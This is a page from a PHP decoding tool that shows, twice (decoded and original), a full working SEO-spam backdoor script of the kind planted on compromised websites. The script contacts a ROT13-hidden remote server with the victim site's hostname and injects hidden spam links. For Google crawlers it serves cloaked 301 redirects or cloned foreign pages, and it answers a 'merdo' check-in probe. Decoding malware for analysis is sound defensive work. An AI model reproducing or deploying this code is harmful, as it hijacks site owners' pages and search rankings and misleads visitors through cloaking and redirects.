Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @ob_start(); $aXIvxGToAShyxzmNYYBs = 'U98oeTV3sIRv792fH8bNxcNE4qK518GDCDBQwzdbrbQ1i..
Decoded Output download
<?php @ob_start();
$aXIvxGToAShyxzmNYYBs = 'U98oeTV3sIRv792fH8bNxcNE4qK518GDCDBQwzdbrbQ1imaSv1fHLSLyD7C8GDaWagWaLwNg';
$PrJoxBPtcOdjQVfOnDyU = 'xNO0138AMWLmrYfLGfZppck3viIu210tQkfRJb4Z9+AzusLytSSbrWxLOGBLbkLhGMf+X+c69Qk=';
$sANbmaZNlPFFusRrBzRr = 'gmVz5ui3T+QWcrEKlhGnmvBsMdZobZoc1fCvo07GwSG8XQzNjH8UWYktyj/sxFQN0KsC1VAXxg==';
$LskfPFwBOUrtXPUvnFAz = 'DzwBiqfgBVgwbhayJXBOXNknXGViTNDGMBCCYXGxAtBJYoTOKF';
if (@$_GET["merdo"])
{
echo "<!--SYSADMIN-->";
exit();
}
$TVFPSNSAkohQTaMMJVMw = @$_SERVER["HTTP_HOST"];
$TVFPSNSAkohQTaMMJVMw = str_replace("www.", "", $TVFPSNSAkohQTaMMJVMw);
function UkmyJXxhOePtNDOGDvCm($nSugfdGEQonLUwvBxmeH)
{
if (function_exists("curl_init"))
{
$uEWqpWDNxdyiGHlAaJMs = curl_init();
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_URL, $nSugfdGEQonLUwvBxmeH);
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_RETURNTRANSFER, true);
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_USERAGENT, "RaBot");
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_TIMEOUT, 10);
return curl_exec($uEWqpWDNxdyiGHlAaJMs);
}
else
{
return file_get_contents($nSugfdGEQonLUwvBxmeH);
}
}
function PUPiZMyoIZhGCSTGBuNm($liFrOkrztEPMEtxLpsWs)
{
$jLpGtFaSvKOauTheBgTC = @json_decode(str_rot13($liFrOkrztEPMEtxLpsWs) , true);
if ($jLpGtFaSvKOauTheBgTC["type"] == "link" || $jLpGtFaSvKOauTheBgTC["type"] == "anti")
{
if (count($jLpGtFaSvKOauTheBgTC["links"]))
{
$yZppURzdTCFuTlkTtUWO = "";
foreach ($jLpGtFaSvKOauTheBgTC["links"] as $LwWivlFBqESHYisGpemw)
{
$yZppURzdTCFuTlkTtUWO .= "<a href=\"" . $LwWivlFBqESHYisGpemw["url"] . "\" title=\"" . $LwWivlFBqESHYisGpemw["title"] . "\">" . $LwWivlFBqESHYisGpemw["baslik"] . "</a>
";
}
$oKUuRfeQLJXCCIBsvGfM = $jLpGtFaSvKOauTheBgTC["html"];
$oKUuRfeQLJXCCIBsvGfM = str_replace("{LINK_CODE_REPLACE}", $yZppURzdTCFuTlkTtUWO, $oKUuRfeQLJXCCIBsvGfM);
echo $oKUuRfeQLJXCCIBsvGfM;
}
else
{
$oKUuRfeQLJXCCIBsvGfM = $jLpGtFaSvKOauTheBgTC["html"];
$oKUuRfeQLJXCCIBsvGfM = str_replace("{LINK_CODE_REPLACE}", "", $oKUuRfeQLJXCCIBsvGfM);
echo $oKUuRfeQLJXCCIBsvGfM;
}
}
elseif ($jLpGtFaSvKOauTheBgTC["type"] == "redirect")
{
if (@preg_match("#google#", $_SERVER["HTTP_USER_AGENT"]))
{
$uri = $_SERVER["REQUEST_URI"];
$rand_keys = array_rand($jLpGtFaSvKOauTheBgTC["links"], 1);
$myurl = rtrim($jLpGtFaSvKOauTheBgTC["links"][$rand_keys]["url"], "/");
header("HTTP/1.1 301 Moved Permanently");
header("Location: " . $myurl . "");
exit();
}
}
elseif ($jLpGtFaSvKOauTheBgTC["type"] == "clone")
{
if (@preg_match("#google#", $_SERVER["HTTP_USER_AGENT"]))
{
$uri = @$_SERVER["REQUEST_URI"];
$pinfo = pathinfo($uri);
if (preg_match("#\.css#", $uri))
{
header("Content-Type: text/css");
}
if (@$pinfo["extension"] == "jpg" || @$pinfo["extension"] == "jpeg")
{
header("Content-Type: image/jpeg");
}
if (preg_match("#\.js#", $uri))
{
header("Content-Type: text/javascript");
}
if (preg_match("#\.xml#", $uri))
{
header("Content-Type: application/xml");
}
$host = @$_SERVER["HTTP_HOST"];
$host = str_replace("www.", "", $host);
$uri = $_SERVER["REQUEST_URI"];
$rand_keys = array_rand($jLpGtFaSvKOauTheBgTC["links"], 1);
$myurl = rtrim($jLpGtFaSvKOauTheBgTC["links"][$rand_keys]["url"], "/");
$url = $myurl . $uri;
$curlSession = curl_init();
curl_setopt($curlSession, CURLOPT_URL, $url);
curl_setopt($curlSession, CURLOPT_REFERER, $myurl);
curl_setopt($curlSession, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlSession, CURLOPT_TIMEOUT, 30);
curl_setopt($curlSession, CURLOPT_USERAGENT, "xMen");
$response = curl_exec($curlSession);
curl_close($curlSession);
$body = $response;
$parse = parse_url($myurl);
$p_host = str_replace('www.', '', $parse["host"]);
$body = str_replace($p_host, $host, $body);
print $body;
exit();
}
}
if (@preg_match("#google#", $_SERVER["HTTP_USER_AGENT"]))
{
}
else
{
echo $jLpGtFaSvKOauTheBgTC["amung"];
}
}
$aXIvxGToAShyxzmNYYBs = str_rot13("uggc://jjj.wnxxryyl.pbz/kynetr.cuc") . "?merdo=" . $TVFPSNSAkohQTaMMJVMw;
$bSBGqQwIsQqRrEmIvrsL = UkmyJXxhOePtNDOGDvCm($aXIvxGToAShyxzmNYYBs);
PUPiZMyoIZhGCSTGBuNm($bSBGqQwIsQqRrEmIvrsL); ?>
Did this file decode correctly?
Original Code
<?php @ob_start();
$aXIvxGToAShyxzmNYYBs = 'U98oeTV3sIRv792fH8bNxcNE4qK518GDCDBQwzdbrbQ1imaSv1fHLSLyD7C8GDaWagWaLwNg';
$PrJoxBPtcOdjQVfOnDyU = 'xNO0138AMWLmrYfLGfZppck3viIu210tQkfRJb4Z9+AzusLytSSbrWxLOGBLbkLhGMf+X+c69Qk=';
$sANbmaZNlPFFusRrBzRr = 'gmVz5ui3T+QWcrEKlhGnmvBsMdZobZoc1fCvo07GwSG8XQzNjH8UWYktyj/sxFQN0KsC1VAXxg==';
$LskfPFwBOUrtXPUvnFAz = 'DzwBiqfgBVgwbhayJXBOXNknXGViTNDGMBCCYXGxAtBJYoTOKF';
if (@$_GET["merdo"])
{
echo "<!--SYSADMIN-->";
exit();
}
$TVFPSNSAkohQTaMMJVMw = @$_SERVER["HTTP_HOST"];
$TVFPSNSAkohQTaMMJVMw = str_replace("www.", "", $TVFPSNSAkohQTaMMJVMw);
function UkmyJXxhOePtNDOGDvCm($nSugfdGEQonLUwvBxmeH)
{
if (function_exists("curl_init"))
{
$uEWqpWDNxdyiGHlAaJMs = curl_init();
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_URL, $nSugfdGEQonLUwvBxmeH);
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_RETURNTRANSFER, true);
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_USERAGENT, "RaBot");
curl_setopt($uEWqpWDNxdyiGHlAaJMs, CURLOPT_TIMEOUT, 10);
return curl_exec($uEWqpWDNxdyiGHlAaJMs);
}
else
{
return file_get_contents($nSugfdGEQonLUwvBxmeH);
}
}
function PUPiZMyoIZhGCSTGBuNm($liFrOkrztEPMEtxLpsWs)
{
$jLpGtFaSvKOauTheBgTC = @json_decode(str_rot13($liFrOkrztEPMEtxLpsWs) , true);
if ($jLpGtFaSvKOauTheBgTC["type"] == "link" || $jLpGtFaSvKOauTheBgTC["type"] == "anti")
{
if (count($jLpGtFaSvKOauTheBgTC["links"]))
{
$yZppURzdTCFuTlkTtUWO = "";
foreach ($jLpGtFaSvKOauTheBgTC["links"] as $LwWivlFBqESHYisGpemw)
{
$yZppURzdTCFuTlkTtUWO .= "<a href=\"" . $LwWivlFBqESHYisGpemw["url"] . "\" title=\"" . $LwWivlFBqESHYisGpemw["title"] . "\">" . $LwWivlFBqESHYisGpemw["baslik"] . "</a>\n";
}
$oKUuRfeQLJXCCIBsvGfM = $jLpGtFaSvKOauTheBgTC["html"];
$oKUuRfeQLJXCCIBsvGfM = str_replace("{LINK_CODE_REPLACE}", $yZppURzdTCFuTlkTtUWO, $oKUuRfeQLJXCCIBsvGfM);
echo $oKUuRfeQLJXCCIBsvGfM;
}
else
{
$oKUuRfeQLJXCCIBsvGfM = $jLpGtFaSvKOauTheBgTC["html"];
$oKUuRfeQLJXCCIBsvGfM = str_replace("{LINK_CODE_REPLACE}", "", $oKUuRfeQLJXCCIBsvGfM);
echo $oKUuRfeQLJXCCIBsvGfM;
}
}
elseif ($jLpGtFaSvKOauTheBgTC["type"] == "redirect")
{
if (@preg_match("#google#", $_SERVER["HTTP_USER_AGENT"]))
{
$uri = $_SERVER["REQUEST_URI"];
$rand_keys = array_rand($jLpGtFaSvKOauTheBgTC["links"], 1);
$myurl = rtrim($jLpGtFaSvKOauTheBgTC["links"][$rand_keys]["url"], "/");
header("HTTP/1.1 301 Moved Permanently");
header("Location: " . $myurl . "");
exit();
}
}
elseif ($jLpGtFaSvKOauTheBgTC["type"] == "clone")
{
if (@preg_match("#google#", $_SERVER["HTTP_USER_AGENT"]))
{
$uri = @$_SERVER["REQUEST_URI"];
$pinfo = pathinfo($uri);
if (preg_match("#\.css#", $uri))
{
header("Content-Type: text/css");
}
if (@$pinfo["extension"] == "jpg" || @$pinfo["extension"] == "jpeg")
{
header("Content-Type: image/jpeg");
}
if (preg_match("#\.js#", $uri))
{
header("Content-Type: text/javascript");
}
if (preg_match("#\.xml#", $uri))
{
header("Content-Type: application/xml");
}
$host = @$_SERVER["HTTP_HOST"];
$host = str_replace("www.", "", $host);
$uri = $_SERVER["REQUEST_URI"];
$rand_keys = array_rand($jLpGtFaSvKOauTheBgTC["links"], 1);
$myurl = rtrim($jLpGtFaSvKOauTheBgTC["links"][$rand_keys]["url"], "/");
$url = $myurl . $uri;
$curlSession = curl_init();
curl_setopt($curlSession, CURLOPT_URL, $url);
curl_setopt($curlSession, CURLOPT_REFERER, $myurl);
curl_setopt($curlSession, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlSession, CURLOPT_TIMEOUT, 30);
curl_setopt($curlSession, CURLOPT_USERAGENT, "xMen");
$response = curl_exec($curlSession);
curl_close($curlSession);
$body = $response;
$parse = parse_url($myurl);
$p_host = str_replace('www.', '', $parse["host"]);
$body = str_replace($p_host, $host, $body);
print $body;
exit();
}
}
if (@preg_match("#google#", $_SERVER["HTTP_USER_AGENT"]))
{
}
else
{
echo $jLpGtFaSvKOauTheBgTC["amung"];
}
}
$aXIvxGToAShyxzmNYYBs = str_rot13("uggc://jjj.wnxxryyl.pbz/kynetr.cuc") . "?merdo=" . $TVFPSNSAkohQTaMMJVMw;
$bSBGqQwIsQqRrEmIvrsL = UkmyJXxhOePtNDOGDvCm($aXIvxGToAShyxzmNYYBs);
PUPiZMyoIZhGCSTGBuNm($bSBGqQwIsQqRrEmIvrsL); ?>
Function Calls
ob_start | 1 |
str_replace | 1 |
Stats
MD5 | 357fb51775b96c5a1e301d1873804d6d |
Eval Count | 0 |
Decode Time | 480 ms |